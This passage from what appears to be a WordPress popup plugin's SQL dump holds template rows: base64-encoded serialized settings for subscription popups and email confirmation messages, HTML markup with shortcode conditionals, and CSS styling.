iIjtzOjE6IjEiO319czoyMDoic3ViX3R4dF9jb25maXJtX3NlbnQiO3M6Njc6IkNvbmZpcm1hdGlvbiBsaW5rIHdhcyBzZW50IHRvIHlvdXIgZW1haWwgYWRkcmVzcy4gQ2hlY2sgeW91ciBlbWFpbCEiO3M6MTU6InN1Yl90eHRfc3VjY2VzcyI7czoyNDoiVGhhbmsgeW91IGZvciBzdWJzY3JpYmUhIjtzOjIxOiJzdWJfdHh0X2ludmFsaWRfZW1haWwiO3M6MjI6IkVtcHR5IG9yIGludmFsaWQgZW1haWwiO3M6MjA6InN1Yl90eHRfZXhpc3RzX2VtYWlsIjtzOjIyOiJFbXB0eSBvciBpbnZhbGlkIGVtYWlsIjtzOjE2OiJzdWJfcmVkaXJlY3RfdXJsIjtzOjA6IiI7czoyODoic3ViX3R4dF9jb25maXJtX21haWxfc3ViamVjdCI7czozNDoiQ29uZmlybSBzdWJzY3JpcHRpb24gb24gW3NpdGVuYW1lXSI7czoyNToic3ViX3R4dF9jb25maXJtX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6Mjg6InN1Yl90eHRfY29uZmlybV9tYWlsX21lc3NhZ2UiO3M6MTk3OiJZb3Ugc3Vic2NyaWJlZCBvbiBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPi4gRm9sbG93IDxhIGhyZWY9XCJbY29uZmlybV9saW5rXVwiPnRoaXMgbGluazwvYT4gdG8gY29tcGxldGUgeW91ciBzdWJzY3JpcHRpb24uIElmIHlvdSBkaWQgbm90IHN1YnNjcmliZSBoZXJlIC0ganVzdCBpZ25vcmUgdGhpcyBtZXNzYWdlLiI7czozMToic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfc3ViamVjdCI7czozNzoiW3NpdGVuYW1lXSBZb3VyIHVzZXJuYW1lIGFuZCBwYXNzd29yZCI7czoyODoic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MzE6InN1Yl90eHRfc3Vic2NyaWJlcl9tYWlsX21lc3NhZ2UiO3M6NjU6IlVzZXJuYW1lOiBbdXNlcl9sb2dpbl08YnIgLz5QYXNzd29yZDogW3Bhc3N3b3JkXTxiciAvPltsb2dpbl91cmxdIjtzOjI1OiJzdWJfcmVkaXJlY3RfZW1haWxfZXhpc3RzIjtzOjA6IiI7czoxMzoic3ViX2J0bl9sYWJlbCI7czo4OiJTaWduLXVwISI7czoxMzoic3ViX25ld19lbWFpbCI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MTU6InN1Yl9uZXdfc3ViamVjdCI7czo0MDoiTmV3IFN1YnNjcmliZXIgb24gTXkgV29yZFByZXNzIFRlc3QgU2l0ZSI7czoxNToic3ViX25ld19tZXNzYWdlIjtzOjEyOToiWW91IGhhdmUgbmV3IHN1YnNjcmliZXIgb24geW91ciBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPiwgaGVyZSBpcyBzdWJzY3JpYmVyIGluZm9ybWF0aW9uOjxiciAvPltzdWJzY3JpYmVyX2RhdGFdIjtzOjU6InR4dF8wIjtzOjE4OToiPHA+VHVycGlzIGRpcyBhbWV0IGFkaXBpc2NpbmcgaGFjIG1vbnRlcyBvZGlvIGFjIHZlbGl0PyBQb3J0YSwgbm9uIHJob25jdXMgdnV0LCB2ZWwsIGV0IGFkaXBpc2NpbmcgbWFnbmEgcHVsdmluYXIgYWRpcGlzY2luZyBlc3QgYWRpcGlzY2luZyB1cm5hLiBEaWduaXNzaW0gcmhvbmN1cyBzY2VsZXJpc3F1ZSBwdWx2aW5hcj88L3A+Ijt9czoxMDoib3B0c19hdHRycyI7YToyOntzOjk6ImJnX251bWJlciI7czoxOiIyIjtzOjE2OiJ0eHRfYmxvY2tfbnVtYmVyIjtzOjE6IjEiO319','<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupListsShell\">\r\n	<a href=\"#\" class=\"ppsPopupClose ppsPopupClose_[close_btn]\"></a>\r\n	<div class=\"ppsInnerTblContent\">\r\n		<div class=\"ppsPopupListsInner ppsPopupInner\">\r\n			[if enb_label]\r\n				<div class=\"label-window\">\r\n					<div class=\"ppsPopupLabel ppsPopupListsLabel\">[label]</div>\r\n				</div>\r\n			[endif]\r\n			<div style=\"clear: both;\"></div>\r\n			<div class=\"ppsRightCol\">\r\n				[if enb_txt_0]\r\n					<div class=\"ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_0 ppsPopupTxt_0\">\r\n					[txt_0]\r\n					</div>\r\n				[endif]\r\n				<div style=\"clear: both;\"></div>\r\n				[if enb_subscribe]\r\n					<div class=\"ppsSubscribeShell\">\r\n						[sub_form_start]\r\n						[sub_fields_html]\r\n						<input type=\"submit\" name=\"submit\" value=\"[sub_btn_label]\" />\r\n						[sub_form_end]\r\n						<div style=\"clear: both;\"></div>\r\n					</div>\r\n				[endif]\r\n				[if enb_sm]\r\n					<div class=\"ppsSm\">\r\n					[sm_html]\r\n					</div>\r\n				[endif]\r\n				[if enb_foot_note]\r\n					<div class=\"ppsFootNote\">\r\n					[foot_note]\r\n					</div>\r\n				[endif]\r\n			</div>\r\n		</div>\r\n	</div>\r\n</div>','#ppsPopupShell_[ID] {\r\n	width: [width][width_measure];\r\n  	padding: 15px;\r\n  	font-family: Georgia, Times, serif;\r\n	font-size: 13px;\r\n	line-height: 21px;\r\n	font-weight: normal;\r\n	color: #000;\r\n}\r\n#ppsPopupShell_[ID] .ppsInnerTblContent {\r\n	display: table;\r\n  [if bg_type_0 == \'color\']\r\n	background: -moz-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ff3.6+ */\r\n	background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}), color-stop(100%, [bg_color_0])); /* safari4+,chrome */\r\n	background:-webkit-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* safari5.1+,chrome10+ */\r\n	background: -o-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* opera 11.10+ */\r\n	background: -ms-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ie10+ */\r\n	background:radial-gradient(ellipse at center, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}\', endColorstr=\'[bg_color_0]\',GradientType=1 ); /* ie6-9 */\r\n  	[elseif bg_type_0 == \'img\']\r\n  	background-image: url(\"[bg_img_0]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupInner {\r\n  {% if popup.params.tpl.enb_subscribe or popup.params.tpl.enb_foot_note or popup.params.tpl.enb_sm %}\r\n  	width: 50%;\r\n	[else]\r\n  	width: 100%;\r\n  	[endif]\r\n  	display: table-cell;\r\n}\r\n#ppsPopupShell_[ID] .label-window{\r\n    background-color: rgba(10,10,10,0.6);\r\n    width: 70%;\r\n    padding-top: 10px;\r\n    padding-bottom: 10px;\r\n    margin-top: 20px;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsPopupLabel {\r\n	color: #000;\r\n	font-family: \'Open Sans\', arial;\r\n	font-size: 28px;\r\n	font-weight: 100;\r\n	color: #ffffff;\r\n	text-shadow: #000000 1px 1px 1px;\r\n	margin-top: 15px;\r\n	margin-bottom: 16px;\r\n	padding-left: 20px;\r\n}\r\n#ppsPopupShell_[ID] .ppsRightCol {\r\n	/*display: table-cell;*/\r\n  	float:right;\r\n  	width: 50%;\r\n  	height: 100%;\r\n  	margin-bottom: 30px;\r\n  	margin-top: 65px;\r\n  	[if bg_type_1 == \'color\']\r\n  	background-color: rgba(0,0,0,0.7);\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell form {\r\n	padding: 30px 30px 0;\r\n	text-align: right;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	width: 100%;\r\n  	margin-bottom: 10px;\r\n  	height: 40px;\r\n  	border: none;\r\n  	border-radius: 3px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=password],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n  	background-color: rgba(0,0,0,0.8) !important;\r\n  	padding-left: 10px;\r\n  	font-size: 17px;\r\n  	color: #fff;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect {\r\n	display: table;\r\n  	text-align: left;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	display: table-cell;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel {\r\n	opacity: 0.5;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	width: 100%;\r\n  	background-color: transparent;\r\n  	height: 40px;\r\n  	border: none;\r\n  	font-size: 17px;\r\n  	color: #fff;\r\n  	border-top-right-radius: 3px;\r\n  	border-bottom-right-radius: 3px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select option {\r\n	color: #000;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	font-family: inherit;\r\n  	height: auto;\r\n    padding-top: 5px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit] {\r\n	border-color: #000;\r\n  	font-family: \'Open Sans\', arial;\r\n	font-weight: 100;\r\n	color: #ffffff;\r\n  	width: 60%;\r\n	text-shadow: #000000 1px 1px 1px;\r\n  	[if bg_type_1 == \'color\']\r\n  	background: [bg_color_1];\r\n    background: -moz-linear-gradient(90deg, [bg_color_2] 0%, {{ adjust_brightness(popup.params.tpl.bg_color_2, 100) }} 63%);\r\n    background: -webkit-linear-gradient(270deg, [bg_color_2] 0%, {{ adjust_brightness(popup.params.tpl.bg_color_2, 100) }} 63%);\r\n    background: -o-linear-gradient(270deg, [bg_color_2] 0%, {{ adjust_brightness(popup.params.tpl.bg_color_2, 100) }} 63%);\r\n    background: -ms-linear-gradient(270deg, [bg_color_2] 0%, {{ adjust_brightness(popup.params.tpl.bg_color_2, 100) }} 63%);\r\n    background: linear-gradient(0deg, [bg_color_2]) 0%, {{ adjust_brightness(popup.params.tpl.bg_color_2, 100) }} 63%);\r\n  	[elseif bg_type_1 == \'img\']\r\n  	background-image: url(\"[bg_img_1]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n  \r\n  	\r\n  	cursor: pointer;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit]:hover {\r\n	box-shadow: inset 1px 1px 3px #666;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\n  	text-align: center;\r\n  	font-family: \'Open Sans\', arial;\r\n 	font-weight: 100;\r\n	color: #ffffff;\r\n	text-shadow: #000000 1px 1px 1px;\r\n  	font-size: 14px;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\n  	margin: 20px;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsPopupClose {\r\n	background-repeat: no-repeat;\r\n  	cursor: pointer;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose.ppsPopupClose_lists_black {\r\n 	top: 0 !important;\r\n  	right: 0 !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsFootNote{\r\n	color: #585858;\r\n    font-family: \"Helvetica Neue\",Helvetica,Arial,sans-serif;\r\n    font-size: x-small;\r\n    font-style: italic;\r\n    line-height: 14px;\r\n  	margin: 5px 30px;\r\n}','nature.png',1,1,1,1,0,0,0,'2015-01-10 17:59:43',21,0),(13,'Ready',1,0,'YTozOntzOjQ6Im1haW4iO2E6MjE6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNToic2hvd19vbl9jbGlja19vbl9lbF9kZWxheSI7czoxOiIwIjtzOjI3OiJzaG93X29uX3Njcm9sbF93aW5kb3dfZGVsYXkiO3M6MToiMCI7czozMzoic2hvd19vbl9zY3JvbGxfd2luZG93X3BlcmNfc2Nyb2xsIjtzOjE6IjAiO3M6Mjg6InNob3dfb25fYWZ0ZXJfaW5hY3RpdmVfdmFsdWUiO3M6MjoiMTAiO3M6MjU6InNob3dfb25fbGlua19mb2xsb3dfZGVsYXkiO3M6MToiMCI7czo4OiJjbG9zZV9vbiI7czoxMDoidXNlcl9jbG9zZSI7czoyNToiY2xvc2Vfb25fYWZ0ZXJfdGltZV92YWx1ZSI7czoxOiI1IjtzOjEwOiJzaG93X3BhZ2VzIjtzOjM6ImFsbCI7czoxNDoic2hvd190aW1lX2Zyb20iO3M6NzoiMTI6MDBhbSI7czoxMjoic2hvd190aW1lX3RvIjtzOjc6IjEyOjAwYW0iO3M6Nzoic2hvd190byI7czo4OiJldmVyeW9uZSI7czoyOToic2hvd190b19maXJzdF90aW1lX3Zpc2l0X2RheXMiO3M6MjoiMzAiO3M6MzA6InNob3dfdG9fdW50aWxfbWFrZV9hY3Rpb25fZGF5cyI7czoyOiIzMCI7czoyMToiaGlkZV9mb3JfZGV2aWNlc19zaG93IjtzOjE6IjAiO3M6MjQ6ImhpZGVfZm9yX3Bvc3RfdHlwZXNfc2hvdyI7czoxOiIwIjtzOjE3OiJoaWRlX2Zvcl9pcHNfc2hvdyI7czoxOiIwIjtzOjEyOiJoaWRlX2Zvcl9pcHMiO3M6MDoiIjtzOjIzOiJoaWRlX2Zvcl9jb3VudHJpZXNfc2hvdyI7czoxOiIwIjtzOjIzOiJoaWRlX2Zvcl9sYW5ndWFnZXNfc2hvdyI7czoxOiIwIjt9czozOiJ0cGwiO2E6Nzg6e3M6NToid2lkdGgiO3M6MzoiNTAwIjtzOjEzOiJ3aWR0aF9tZWFzdXJlIjtzOjI6InB4IjtzOjE4OiJiZ19vdmVybGF5X29wYWNpdHkiO3M6MzoiMC41IjtzOjk6ImJnX3R5cGVfMCI7czozOiJpbWciO3M6ODoiYmdfaW1nXzAiO3M6MzY6IltQUFNfQVNTRVRTX1VSTF1pbWcvYXNzZXRzL3JlYWR5LmpwZyI7czoxMDoiYmdfY29sb3JfMCI7czo3OiIjMjMyMzIzIjtzOjk6ImJnX3R5cGVfMSI7czo1OiJjb2xvciI7czo4OiJiZ19pbWdfMSI7czowOiIiO3M6MTA6ImJnX2NvbG9yXzEiO3M6NzoiI2ZmNDMwMCI7czo5OiJiZ190eXBlXzIiO3M6NToiY29sb3IiO3M6ODoiYmdfaW1nXzIiO3M6MDoiIjtzOjEwOiJiZ19jb2xvcl8yIjtzOjc6IiNmZjQzMDAiO3M6MTA6ImZvbnRfbGFiZWwiO3M6NzoiZGVmYXVsdCI7czoxNjoibGFiZWxfZm9udF9jb2xvciI7czo3OiIjZmZmZmZmIjtzOjEwOiJmb250X3R4dF8wIjtzOjc6ImRlZmF1bHQiO3M6MTc6InRleHRfZm9udF9jb2xvcl8wIjtzOjc6IiNmZmZmZmYiO3M6MTE6ImZvbnRfZm9vdGVyIjtzOjc6ImRlZmF1bHQiO3M6MTc6ImZvb3Rlcl9mb250X2NvbG9yIjtzOjc6IiNmZmZmZmYiO3M6OToiY2xvc2VfYnRuIjtzOjExOiJ3aGlsZV9jbG9zZSI7czo3OiJidWxsZXRzIjtzOjExOiJjbGFzc3lfYmx1ZSI7czoxMToibGF5ZXJlZF9wb3MiO3M6MzoidG9wIjtzOjk6ImVuYl9sYWJlbCI7czoxOiIxIjtzOjU6ImxhYmVsIjtzOjI2OiJBUkUgWU9VIFJFQURZPyBHRVQgSVQgTk9XISI7czo5OiJlbmJfdHh0XzAiO3M6MToiMSI7czoxMzoiZW5iX2Zvb3Rfbm90ZSI7czoxOiIxIjtzOjk6ImZvb3Rfbm90ZSI7czo1ODoiWW91ciBJbmZvcm1hdGlvbiB3aWxsIG5ldmVyIGJlIHNoYXJlZCB3aXRoIGFueSB0aGlyZCBwYXJ0eSI7czoxNToiZW5iX3NtX2ZhY2Vib29rIjtzOjE6IjEiO3M6MTc6ImVuYl9zbV9nb29nbGVwbHVzIjtzOjE6IjEiO3M6MTQ6ImVuYl9zbV90d2l0dGVyIjtzOjE6IjEiO3M6OToic21fZGVzaWduIjtzOjY6InNpbXBsZSI7czo4OiJhbmltX2tleSI7czo4OiJ0aW5fZG93biI7czoxMzoiYW5pbV9kdXJhdGlvbiI7czowOiIiO3M6MTM6ImVuYl9zdWJzY3JpYmUiO3M6MToiMSI7czo4OiJzdWJfZGVzdCI7czo5OiJ3b3JkcHJlc3MiO3M6MjM6InN1Yl93cF9jcmVhdGVfdXNlcl9yb2xlIjtzOjEwOiJzdWJzY3JpYmVyIjtzOjE5OiJzdWJfYXdlYmVyX2xpc3RuYW1lIjtzOjA6IiI7czoyMToic3ViX2F3ZWJlcl9hZHRyYWNraW5nIjtzOjA6IiI7czoyMToic3ViX21haWxjaGltcF9hcGlfa2V5IjtzOjA6IiI7czoxNDoic3ViX2dyX2FwaV9rZXkiO3M6MDoiIjtzOjE0OiJzdWJfYWNfYXBpX3VybCI7czowOiIiO3M6MTQ6InN1Yl9hY19hcGlfa2V5IjtzOjA6IiI7czoxODoic3ViX2FyX2Zvcm1fYWN0aW9uIjtzOjA6IiI7czoxMDoic3ViX3NnYV9pZCI7czowOiIiO3M6MTU6InN1Yl9zZ2FfbGlzdF9pZCI7czowOiIiO3M6MjE6InN1Yl9zZ2FfYWN0aXZhdGVfY29kZSI7czowOiIiO3M6MTA6InN1Yl9maWVsZHMiO2E6Mjp7czo0OiJuYW1lIjthOjc6e3M6MzoiZW5iIjtzOjE6IjEiO3M6NDoibmFtZSI7czo0OiJuYW1lIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo0OiJOYW1lIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMCI7fXM6NToiZW1haWwiO2E6Nzp7czo0OiJuYW1lIjtzOjU6ImVtYWlsIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo2OiJFLU1haWwiO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIxIjtzOjM6ImVuYiI7czoxOiIxIjt9fXM6MjA6InN1Yl90eHRfY29uZmlybV9zZW50IjtzOjY3OiJDb25maXJtYXRpb24gbGluayB3YXMgc2VudCB0byB5b3VyIGVtYWlsIGFkZHJlc3MuIENoZWNrIHlvdXIgZW1haWwhIjtzOjE1OiJzdWJfdHh0X3N1Y2Nlc3MiO3M6MjQ6IlRoYW5rIHlvdSBmb3Igc3Vic2NyaWJlISI7czoyMToic3ViX3R4dF9pbnZhbGlkX2VtYWlsIjtzOjIyOiJFbXB0eSBvciBpbnZhbGlkIGVtYWlsIjtzOjE2OiJzdWJfcmVkaXJlY3RfdXJsIjtzOjA6IiI7czoyODoic3ViX3R4dF9jb25maXJtX21haWxfc3ViamVjdCI7czozNDoiQ29uZmlybSBzdWJzY3JpcHRpb24gb24gW3NpdGVuYW1lXSI7czoyNToic3ViX3R4dF9jb25maXJtX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6Mjg6InN1Yl90eHRfY29uZmlybV9tYWlsX21lc3NhZ2UiO3M6MTk3OiJZb3Ugc3Vic2NyaWJlZCBvbiBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPi4gRm9sbG93IDxhIGhyZWY9XCJbY29uZmlybV9saW5rXVwiPnRoaXMgbGluazwvYT4gdG8gY29tcGxldGUgeW91ciBzdWJzY3JpcHRpb24uIElmIHlvdSBkaWQgbm90IHN1YnNjcmliZSBoZXJlIC0ganVzdCBpZ25vcmUgdGhpcyBtZXNzYWdlLiI7czozMToic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfc3ViamVjdCI7czozNzoiW3NpdGVuYW1lXSBZb3VyIHVzZXJuYW1lIGFuZCBwYXNzd29yZCI7czoyODoic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MzE6InN1Yl90eHRfc3Vic2NyaWJlcl9tYWlsX21lc3NhZ2UiO3M6NjU6IlVzZXJuYW1lOiBbdXNlcl9sb2dpbl08YnIgLz5QYXNzd29yZDogW3Bhc3N3b3JkXTxiciAvPltsb2dpbl91cmxdIjtzOjI1OiJzdWJfcmVkaXJlY3RfZW1haWxfZXhpc3RzIjtzOjA6IiI7czoxMzoic3ViX2J0bl9sYWJlbCI7czo4OiJTaWduLXVwISI7czoxMzoic3ViX25ld19lbWFpbCI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MTU6InN1Yl9uZXdfbWVzc2FnZSI7czoxMjk6IllvdSBoYXZlIG5ldyBzdWJzY3JpYmVyIG9uIHlvdXIgc2l0ZSA8YSBocmVmPVwiW3NpdGV1cmxdXCI+W3NpdGVuYW1lXTwvYT4sIGhlcmUgdXMgc3Vic2NyaWJlciBpbmZvcm1hdGlvbjo8YnIgLz5bc3Vic2NyaWJlcl9kYXRhXSI7czoxODoibG9naW5fcmVkaXJlY3RfdXJsIjtzOjA6IiI7czoxNToibG9naW5fYnRuX2xhYmVsIjtzOjU6IkxvZ2luIjtzOjE2OiJyZWdfcmVkaXJlY3RfdXJsIjtzOjA6IiI7czoyMzoicmVnX3dwX2NyZWF0ZV91c2VyX3JvbGUiO3M6MTA6InN1YnNjcmliZXIiO3M6MTM6InJlZ19idG5fbGFiZWwiO3M6ODoiUmVnaXN0ZXIiO3M6MTA6InJlZ19maWVsZHMiO2E6Mjp7czo0OiJuYW1lIjthOjc6e3M6MzoiZW5iIjtzOjE6IjEiO3M6NDoibmFtZSI7czo0OiJuYW1lIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo0OiJOYW1lIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMCI7fXM6NToiZW1haWwiO2E6Nzp7czo0OiJuYW1lIjtzOjU6ImVtYWlsIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo2OiJFLU1haWwiO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIxIjtzOjM6ImVuYiI7czoxOiIxIjt9fXM6MjA6InJlZ190eHRfY29uZmlybV9zZW50IjtzOjY3OiJDb25maXJtYXRpb24gbGluayB3YXMgc2VudCB0byB5b3VyIGVtYWlsIGFkZHJlc3MuIENoZWNrIHlvdXIgZW1haWwhIjtzOjE1OiJyZWdfdHh0X3N1Y2Nlc3MiO3M6Mjc6IlRoYW5rIHlvdSBmb3IgcmVnaXN0cmF0aW9uISI7czoyMToicmVnX3R4dF9pbnZhbGlkX2VtYWlsIjtzOjIyOiJFbXB0eSBvciBpbnZhbGlkIGVtYWlsIjtzOjI4OiJyZWdfdHh0X2NvbmZpcm1fbWFpbF9zdWJqZWN0IjtzOjM0OiJDb25maXJtIHJlZ2lzdHJhdGlvbiBvbiBbc2l0ZW5hbWVdIjtzOjI1OiJyZWdfdHh0X2NvbmZpcm1fbWFpbF9mcm9tIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czoyODoicmVnX3R4dF9jb25maXJtX21haWxfbWVzc2FnZSI7czoxOTY6IllvdSByZWdpc3RlcmVkIG9uIHNpdGUgPGEgaHJlZj1cIltzaXRldXJsXVwiPltzaXRlbmFtZV08L2E+LiBGb2xsb3cgPGEgaHJlZj1cIltjb25maXJtX2xpbmtdXCI+dGhpcyBsaW5rPC9hPiB0byBjb21wbGV0ZSB5b3VyIHJlZ2lzdHJhdGlvbi4gSWYgeW91IGRpZCBub3QgcmVnaXN0ZXIgaGVyZSAtIGp1c3QgaWdub3JlIHRoaXMgbWVzc2FnZS4iO3M6MzE6InJlZ190eHRfc3Vic2NyaWJlcl9tYWlsX3N1YmplY3QiO3M6Mzc6IltzaXRlbmFtZV0gWW91ciB1c2VybmFtZSBhbmQgcGFzc3dvcmQiO3M6Mjg6InJlZ190eHRfc3Vic2NyaWJlcl9tYWlsX2Zyb20iO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjMxOiJyZWdfdHh0X3N1YnNjcmliZXJfbWFpbF9tZXNzYWdlIjtzOjY1OiJVc2VybmFtZTogW3VzZXJfbG9naW5dPGJyIC8+UGFzc3dvcmQ6IFtwYXNzd29yZF08YnIgLz5bbG9naW5fdXJsXSI7czoxMzoicmVnX25ld19lbWFpbCI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MTU6InJlZ19uZXdfbWVzc2FnZSI7czoxMjE6IllvdSBoYXZlIG5ldyBtZW1iZXIgb24geW91ciBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPiwgaGVyZSB1cyBtZW1iZXIgaW5mb3JtYXRpb246PGJyIC8+W3N1YnNjcmliZXJfZGF0YV0iO3M6NToidHh0XzAiO3M6NTI6IjxwPkluY3JlYXNlIG1vcmUgdGhhbiA3MDAlIG9mIEVtYWlsIFN1YnNjcmliZXJzITwvcD4iO31zOjEwOiJvcHRzX2F0dHJzIjthOjI6e3M6OToiYmdfbnVtYmVyIjtzOjE6IjMiO3M6MTY6InR4dF9ibG9ja19udW1iZXIiO3M6MToiMSI7fX0=','<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupListsShell\">\r\n	<div id=\"close\"><a href=\"#\" class=\"ppsPopupClose ppsPopupClose_[close_btn]\"></a></div>\r\n	<div class=\"ppsInnerTblContent\">\r\n		<div class=\"ppsPopupListsInner ppsPopupInner\">\r\n			<div style=\"clear: both;\"></div>\r\n			<div class=\"ppsRightCol\">\r\n				[if enb_label]\r\n					<div class=\"label-window\">\r\n						<div class=\"ppsPopupLabel ppsPopupListsLabel\"><h2>[label]</h2></div>\r\n					</div>\r\n				[endif]\r\n				[if enb_txt_0]\r\n					<div class=\"ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_0 ppsPopupTxt_0\">\r\n					[txt_0]\r\n					</div>\r\n				[endif]\r\n				<div style=\"clear: both;\"></div>\r\n				[if enb_subscribe]\r\n					<div class=\"ppsSubscribeShell\">\r\n						[sub_form_start]\r\n						[sub_fields_html]\r\n						<input type=\"submit\" name=\"submit\" value=\"[sub_btn_label]\" />\r\n						[sub_form_end]\r\n						<div style=\"clear: both;\"></div>\r\n					</div>\r\n				[endif]\r\n				[if enb_sm]\r\n					<div class=\"ppsSm\">\r\n					[sm_html]\r\n					</div>\r\n				[endif]\r\n				[if enb_foot_note]\r\n					<div class=\"ppsFootNote\">\r\n					[foot_note]\r\n					</div>\r\n				[endif]\r\n			</div>\r\n		</div>\r\n	</div>\r\n</div>','#ppsPopupShell_[ID] {\r\n	width: [width][width_measure];\r\n  	padding: 15px;\r\n  	font-family: Georgia, Times, serif;\r\n	font-size: 13px;\r\n	line-height: 21px;\r\n	font-weight: normal;\r\n	color: #000;\r\n}\r\n#ppsPopupShell_[ID], #ppsPopupShell_[ID] * {\r\n	-webkit-box-sizing: content-box;\r\n	-moz-box-sizing:    content-box;\r\n	box-sizing:         content-box;\r\n}\r\n#ppsPopupShell_[ID] .ppsInnerTblContent {\r\n	display: table;\r\n  	[if bg_type_0 == \'color\']\r\n	background: -moz-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ff3.6+ */\r\n	background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}), color-stop(100%, [bg_color_0])); /* safari4+,chrome */\r\n	background:-webkit-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* safari5.1+,chrome10+ */\r\n	background: -o-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* opera 11.10+ */\r\n	background: -ms-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, 